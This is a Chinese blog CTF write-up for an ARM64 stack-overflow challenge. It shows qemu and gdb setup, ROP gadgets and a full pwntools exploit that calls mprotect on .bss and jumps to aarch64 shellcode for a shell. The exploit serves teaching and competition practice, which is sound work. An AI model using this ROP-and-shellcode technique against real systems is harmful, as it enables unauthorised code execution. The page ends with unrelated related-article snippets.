2018-骇极杯

最新推荐文章于 2021-08-31 08:10:47 发布
最新推荐文章于 2021-08-31 08:10:47 发布
阅读量539 收藏 1
点赞数 1
分类专栏: pwn 文章标签: arm pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Maxmalloc/article/details/87180442
版权

arm

第一次做arm,花了很多时间,希望整理的详细一点。

环境安装

首先需要安装qemu,和相应的依赖库
qemu

sudo apt-get install qemu

依赖库

sudo apt-get install -y gcc-aarch64-linux-gun g++-aarch64-linux-gnu

合在一起安装不了的话就分开来安装

运行

qemu-aarch64 -g 1234 -L /usr/aarch64-linux-gnu ./pwn

-g 1234:给gdb预留的调试端口1234
-L dir :指向BIOS和VGA BIOS所在目录(一般我们使用”-L .”)

调试

^^^
可以挂到socat上,非常方便

socat tcp-l:10002,fork exec:"qemu-aarch64 -g 1234 -L /usr/aarch64-linux-gnu ./pwn",reuseaddr

^^^
要用gdb远程调试
在这里插入图片描述
需要安装一下gdb-multiarch

题目分析

  1. 检查保护
@ubuntu:~/Documents/comp/haiji/arm$ checksec pwn
[*] '/home/hu/Documents/comp/haiji/arm/pwn'
    Arch:     aarch64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

并没有什么保护,就是一个简单的栈溢出。
2. 查看主函数
在这里插入图片描述

读两次
第一次先在bss里面存放shellcode
第二次利用rop执行mprotect,使bss有执行权限
3. 找到合适的gadget(用gdb里面rop指令,更全一点)

0x00000000004008cc : ldp x19, x20, [sp, #0x10] ; ldp x21, x22, [sp, #0x20] ; 
ldp x23, x24, [sp, #0x30] ; ldp x29, x30, [sp], #0x40 ; ret
##将栈上面的值载入到
0x00000000004008ac : ldr x3, [x21, x19, lsl #3] ; mov x2, x22 ; mov x1, x23 ;
 mov w0, w24 ; add x19, x19, #1 ; blr x3

对arm的栈帧结构研究了一下,这里主要说说它与x64的不同:
在arm中,
1.没有没有$rbp寄存器
2.函数的返回值放在$x30中,bl就等价与x64的call,只不过是它将bl下一条指令放在了$x30中,当遇见ret指令时,将$x30中的值赋给PC。
exp

from pwn import *
context.log_level='debug'
context.binary='./pwn'
p = remote('127.0.0.1',10002)

'''
0x00000000004008cc : ldp x19, x20, [sp, #0x10] ; ldp x21, x22, [sp, #0x20] ; 
ldp x23, x24, [sp, #0x30] ; ldp x29, x30, [sp], #0x40 ; ret
0x00000000004008ac : ldr x3, [x21, x19, lsl #3] ; mov x2, x22 ; mov x1, x23 ;
 mov w0, w24 ; add x19, x19, #1 ; blr x3
'''
bss=0x0411068
p.recvuntil('Name:')
payload=p64(0x4007e0)+p64(0)+asm(shellcraft.aarch64.sh()) #坑点2
#这里为什么要用0x4007e0,而不是0x400600,在后面揭晓
'''
.plt:0000000000400600 .mprotect
.plt:0000000000400600 ADRP            X16, #off_411030@PAGE
.plt:0000000000400604 LDR             X17, [X16,#off_411030@PAGEOFF]
.plt:0000000000400608 ADD             X16, X16, #off_411030@PAGEOFF
.plt:000000000040060C BR              X17     ; mpr
'''
p.sendline(payload)
payload='a'*(0x40+8)
payload+=p64(0x4008cc)
payload+=p64(0)+p64(0x4008ac)# ldp x29, x30, [sp], #0x40   #坑点1
#将0x4008ac写入$x30,当ret时,返回到0x4008ac
payload+=p64(0)+p64(0)#ldp x19, x20, [sp, #0x10]
payload+=p64(bss)+p64(7)#ldp x21, x22, [sp, #0x20]    
#ldr x3, [x21, x19, lsl #3],因为需要寻址一次,所以必须将mprotect的地址放在bss里面
payload+=p64(0x1000)+p64(0x411000)#ldp x23, x24, [sp, #0x30]
payload+=p64(0)+p64(bss+0x10)#坑点3
p.send(payload)
p.interactive()

这里要着重说一说坑点2、3,想了很久才想明白。

执行到 blr x3,将blr x3下一条指令存入$x30(反正就是回不来了>.<),所以我们在这就需要从新控制$x30,也就是到执行完mprotect后,需要继续执行bss+0x10的shellcode。
在这里插入图片描述
利用LDP X29, X30, [SP],#0x10这条指令
在这里插入图片描述
所以最后payload+=p64(0)+p64(bss+0x10)就使得执行完mprotect后程序转到shell code上了

https://xz.aliyun.com/t/3154#toc-7
https://cloud.tencent.com/developer/article/1376383

CTF wp 2018”全国大学生网络安全邀请赛暨第四届上海市大学生网络安全大赛线上赛 writeup
Thea_1207的博客
11-05 3932
为0x00 签到题操作内容: | 登陆比赛界面上去看到签到题,一般情况下签到题是没有难度的题目给定一串字符MZWGCZ33GM2TEMRSMQZTALJUGM4WKLJUMFTGELJZGFTDILLBMJSWEYZXGNTGKMBVMN6Q Base32 一闪而过,比的就是手速,解码拿到flag。 FLAG 值: 标志{35222d30-439e-4afb-91F4-abebc73fe0...
vue功能-键盘
一入前端深似海
07-04 4312
继上篇数字键盘以后,这篇文章写一下键盘用法,同猿们拿好小本本! 1.封装的键盘组件 <template> <div class="vitualKeyboard"> <div class="search" :style="{top:topPx,right:rightPx}"> <input name="inputArea" ...
shanghai2018_baby_arm
06-03
arm64架构的pwn
2018[cyvm]
九层台
11-28 493
ida加载 一个switch case。套用大佬的一句话“while循环套switch,不是迷宫就是vm” 这里是vm,第一次做vm的题目。简单说一下vm是什么。 vm其实就是自己定义了一下程序的机器码,比如这里用0x01来表示mov这两个参数,然后用数组来模拟寄存器,栈。在这个题里面vm的数据段和代码放到了一起。 简单跟了一下 ennnn有点不太好懂,贴出官方的步骤 最后一位是原来的值,...
-Web
wyj_1216 House
11-10 1113
”全国大学生网络安全邀请赛WriteUp web1 首先,burpsuite抓一波流量 将GET改为POST,并且post admin=1 访问robots.txt 发现有source.php和flag.php 访问flag.php无果,所以只能去看source.php 这里看到需要伪造ip 在头中伪造ip只有几种情况:xff xci clientip remoteaddr ...
_2018_momo_server(条件竞争UAF)
seaaseesa的博客
09-14 993
_2018_momo_server(条件竞争UAF) 首先,检查一下程序的保护机制 然后,我们用IDA分析一下 Count功能开启了一个线程 该线程会异步进行堆的free操作,其中注意到free(ptr[i]->name)后,没有将name指针清零,并且该循环尾部会休眠1s。 结尾会将ptr指针清零 在add函数中,如果name已存在,那么仅更新count和flag。 因此,我们在ptr[i]被清零之前,通过add更新count和flag,这样,name就会被二
2018年“” web3 GOOD JOB writeup 两种解法
a3320315的博客
10-17 815
0x01 贴出源码 <?php //error_reporting(0); //$dir=md5("icq" . $_SERVER['REMOTE_ADDR']); $dir=md5("icq"); $sandbox = '/var/sandbox/' . $dir; @mkdir($sandbox); @chdir($sandbox); ...
2018上海CTF“”逆向WP
11-12
2018上海CTF“”逆向WP2018上海CTF“”逆向WP
CTF训练计划—[SUCTF 2018]GetShell
Lemon's blog
08-19 4680
前言: 这道题考察的是构造无字母数字的webshell,也挺有趣,被卡了一天了,还有看了网上的WP,千篇一律,所以很有必要记录一下。 [SUCTF 2018]GetShell 直接给出源码 <?php if($contents=file_get_contents($_FILES["file"]["tmp_name"])){ $data=substr($contents,5); foreach ($black_char as $b) { if (stripos($data
NLP-文本分类(2)
热门推荐
lgy54321的博客
04-09 2万+
文章目录1 任务2.IMDB数据集下载探索3.THUCNews数据子集探索 1 任务 数据集 数据集:中、英文数据集各一份 中文数据集:THUCNews THUCNews数据子集:https://pan.baidu.com/s/1hugrfRu 密码:qfud 英文数据集:IMDB数据集 Sentiment Analysis IMDB数据集下载和探索 参考TensorFlow官方教程:影评...
2018.11.4 东华) REVERSE What's it wp
uiop_uiop_uiop的博客
11-06 463
What 打开先要求输入luck string,拖进ida看,输入的必须是长度为6的英文小写。之后对输入的数据取md5,然后遍历生成的MD5串,统计其中0的个数v15和下标总和v14,当满足10*v15+v14 == 403的时候为有效输入。这个题目的亮点在于打开decode函数的时候,有这么一个提示 然后结合着汇编看c代码,然偶看到了check,找check函数,发现 看出来这里是...
buuoj Pwn writeup 181-185
yongbaoii的博客
06-09 481
181 182 183 184 185
buuoj Pwn writeup 246-250
yongbaoii的博客
08-31 340
246 pwnable_echo1 结构简单。 功能1 就是个输入输出。但是显然有个栈溢出。 功能2功能3没有。 啥保护没有,就栈溢出就完了。可以直接rop,它开了NX。也可以shellcode。 写shellcode会有两种,一种是布置在栈上,然后在bss上通过jmp esp跳过去,一种是写在bss上,然后直接跳过去,根据可输入大小来自行调节。 exp 247 actf_2019_actfnote 248 _2018_babyarm 249 metasequoia_2020_samsara
ARM PWN 环境搭建和测试
u012655643的博客
11-29 3575
ARM PWN 环境搭建和测试 最近一次比赛(“” 全国大学生信安邀请赛 )遇到了一道arm pwn的题目,题目不难,附上链接 baby_arm。我就想后面说不定也要做arm的题,就搭建一个环境吧。 手上刚好有个闲置的树莓派3b+,众所周知,树莓派是arm架构的,刚好拿来用。 树莓派装64位系统 都2018年了,怎么还在用32位系统呢? https://github.com/chainsx/...
2018上海CTF“” What’s_it
qq_41071646的博客
11-24 780
从这道题中学到了很多东西-------- 我当时和一个朋友抱怨 有没有有难度的题 而且还有wp的  因为 没有wp 做了好多天都没有结果 还没有答案是一件非常难受的事  本来这个题 我想用ida的idc 或者 python来解题的 但是 后来发现。。。。。 不会 很尴尬 还拿了书 结果 看是能看懂 但是根本就没有办法 怎么说 让问题简单化  用python 我百度了一下 发现还是要调用c语言...
ArmPwn学习
qq_40712959的博客
04-20 873
arm pwn练习 inctf2018_wARMup 程序逻辑 明显的栈溢出,但是只溢出了0x10个字节,很明显,需要栈迁移,但是在程序中,注意其调用read函数的汇编代码,如下,写如数据的缓冲区buf由R3寄存器重置,故若我们可以控制R3寄存器,则可以控制程序输入的位置,这里通过gadget(0x00010364 : pop {r3, pc})实现。 注意程序的endlog,如下图,可以发现,程序的SP由R11寄存器控制,而由于栈溢出漏洞的存在,我们可以控制R11,故我们可以通过控制R11,将其指向b
http://www.hifakeoakleys.com 6666
coffen2015的博客
06-19 1389
The shoes seeming to be one with feet, Christian Louboutin shoes sale she could not control herself Compared wit...
arm64 调试环境搭建及 ROP 实战
weixin_30478619的博客
11-08 516
前言 比赛的一个 arm 64 位的 pwn 题,通过这个题实践了 arm 64 下的 rop 以及调试环境搭建的方式。 题目文件 https://gitee.com/hac425/blog_data/tree/master/arm64 程序分析 首先看看程序开的保护措施,架构信息 hac425@ubuntu:~/workplace$ checksec pwn [*] '/home/hac425/...
2018安恒一月赛 Reverse WP
BadRer的博客
05-06 2017
前言 第一次接触C++的程序,确实把我给绕晕了,很多基本的输入输入和函数都没有掌握,也就很难去分析了。这里学习了一波,记录一下。 分析 程序打开有2M多,几千行代码。emmm。从该字符串入手, C++反汇编之后的函数,我们可能看不懂,但是IDA都给我们注释了,了解过C++的同学应该知道cout,cin,endl,&lt;&lt;&lt;之类的代码,F5反汇编查看, is_le...
MouseTrapp:探索技术乐趣与人真相
资源摘要信息:"MouseTrapp: 人的乐趣"可能是指一个与技术相关的项目、软件、工具或游戏。从标题可以推测,MouseTrapp可能是以鼠标操作为核心,可能是一个旨在提供乐趣或娱乐的程序。标题中的"人的乐趣"暗示了该...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值